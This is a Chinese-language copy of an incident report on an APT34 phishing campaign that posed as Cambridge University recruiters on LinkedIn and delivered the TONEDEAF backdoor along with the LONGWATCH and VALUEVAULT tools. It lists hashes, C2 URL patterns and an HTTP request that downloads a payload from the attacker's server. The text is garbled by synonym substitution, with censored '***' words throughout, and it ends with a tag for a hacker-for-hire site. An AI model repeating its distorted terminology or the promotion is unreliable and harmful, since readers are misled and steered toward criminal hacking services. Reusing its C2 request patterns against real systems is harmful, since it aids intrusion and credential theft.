APT34被认为是一个为伊朗的国家利益服务的黑客安排，首要侧重于 *** 间谍活动，至少从2014年开端就一向处于活泼状况。这个安排现已广泛地针对各个职业，包含金融、 *** 、动力、化工和电信，而且首要会集在中东地区。 跟着中东地缘政治紧张局势的加重，伊朗对战略情报的需求也变得越来越火急。咱们估计，伊朗在未来将大幅添加 *** 间谍活动的规划和规模，且很或许从政客和中心安排下手来添补这一空白。这一点从其歹意软件和基础设施的增长上就能够显着看出。 *** 垂钓举动 在2019年6月下旬，FireEye辨认出了一场 *** 垂钓举动，并将其归于伊朗要挟安排APT34（又称Oilrig、Cobalt Gypsy），该举动有以下三个要害特点： · 进犯者伪装成剑桥大学成员的身份以取得受害者信赖； · 运用LinkedIn传递歹意文档； · 有三类之前未在APT34的武器库中发现的歹意软件。 且本次举动首要针对以下职业：动力和公用事业； *** ；油气。 开始剖析 2019年6月19日，FireEye Endpoint Security设备上收到了缝隙检测警报。违规应用程序被辨认为Microsoft Excel，并由FireEye Endpoint Security的ExploitGuard引擎当即间断。 ExploitGuard具有行为监控，检测和防备功用，可监控应用程序行为，查找要挟行为者用来损坏传统检测机制的各种异常情况。随后能够对违规应用程序进行沙盒化或停止，防止缝隙运用进入下一个编程过程。 Managed Defense SOC剖析了警报，并辨认出坐落C： Users .templates中的名为System.doc（MD5：b338baa673ac007d7af54075ea69660b）的歹意文件。文件System.doc的本质上是Windows可移植可履行文件（PE）。FireEye将这类新歹意软件确认为TONEDEAF。 TONEDEAF是一个后门，运用HTTP GET和POST恳求与单个C2服务器通讯，支撑搜集体系信息、上传和下载文件以及恣意shell指令履行。履行时，TONEDEAF将加密数据写入两个临时文件temp.txt和temp2.txt，这两个文件在履行时坐落同一个目录中。咱们将在本文附录中讨论TONEDEAF的其他技术细节。 回溯到进犯检测之前的过程，FireEye发现System.doc被一个名为ERFT-Details.xls的文件植入，并找到了ERFT-Details.xls文件的链接：http：//www.cam-research-ac [.] com / Documents / ERFT-Details.xls。 *** 依据显现在该表格下载之前受害者还访问了LinkedIn的音讯。与受害者联络后咱们得知，文件确实是是经过LinkedIn音讯收到的，进犯者伪装成“剑桥大学研究人员”的应聘者“Rebecca Watts”。图1显现了Watts女士的求职留言。 图1：链接实践引导向TONEDEAF 这不是咱们之一次看到APT34在各类举动中伪装成学术人员求职的姿态，对话一般发生在交际媒体渠道上，假如方针安排将要点放在电子邮件防护上，那么交际媒体渠道或许便是一种有用的传递机制。 FireEye检查了原始文件ERFT-Details.xls，该文件至少有两个仅有的MD5文件哈希值： · 96feed478c347d4b95a8224de26a1b2c · caf418cbf6a9c4e93e79d4714d5d3b87 文件是base64编码的，翻开后会在方针目录中创立System.doc，用于创立的VBA代码片段如图2所示。 图2：System.doc中的VBA代码片段 此Excel文档还会创立一个名为“windows update check”的计划任务，每分钟运转文件C:Users.templatesSystem Manager.exe一次，最终的VBA函数会将System.doc重命名为System Manager.exe。创立计划任务、含糊处理以防止简略检测的VBA代码片段如图3所示。 图3：System.doc中的其他VBA代码 初次履行TONEDEAF时，FireEye经过端口80确认了对C2服务器offlineearthquake [.] com的回调。 进一步发掘 在确认offlineearthquake [.] com作为潜在C2域后，FireEye在可见规模内进行了更广泛的搜索，并发现了别的两个在该域上的歹意软件，别离名为VALUEVAULT和LONGWATCH，还确认了PICKPOCKET（一种浏览器凭证偷盗东西）的一种变体。 对offlineéarthquake[.] com的恳求能够采纳多种形式，详细取决于歹意软件的装置和意图。此外，在装置过程中，歹意软件会检索体系和当时用户名，这些用户名用于创立三个字符的“sys_id”。此值用于后续恳求，或许会盯梢受感染的方针活动。网址的结构如下: · hxxp[://]offlineearthquake[.]com/download?id=&n=000 · hxxp[://]offlineearthquake[.]com/upload?id=&n=000 · hxxp[://]offlineearthquake[.]com/file//?id=&h=000 · hxxp[://]offlineearthquake[.]com/file//?id=&n=000 在C2上辨认的之一个可履行文件是WinNTProgram.exe（MD5：021a0f57fe09116a43c27e5133a57a0a），FireEye标识为LONGWATCH。 LONGWATCH是一个键盘记录器，能够将键盘记录输出到Window的临时文件夹中的log.txt文件。 有关LONGWATCH的更多信息，请参阅帖子结尾的歹意软件附录部分。 检索VALUEVAULT的HTTP流量片段如下所示： GET hxxp://offlineearthquake.com/file//b.exe?id=&n=000 User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) AppleWebKit/537.36 (KHTML, like Gecko) Host: offlineearthquake[.]com Proxy-Connection: Keep-Alive Pragma: no-cache HTTP/1.1 FireEye将b.exe（MD5：9fff498b78d9498b33e08b892148135f）标识为VALUEVAULT。 VALUEVAULT是来自Massimiliano Montoro的"Windows Vault Password Dumper"浏览器凭证盗取东西的Golang版别，答应操作人员提取和检查存储在Windows Vault中的凭证，此外VALUEVAULT将调用Windows PowerShell来提取浏览器历史记录，以便将浏览器暗码与访问过的站点匹配。有关VALUEVAULT的更多信息，请拜见下面的附录。[1][2]黑客接单网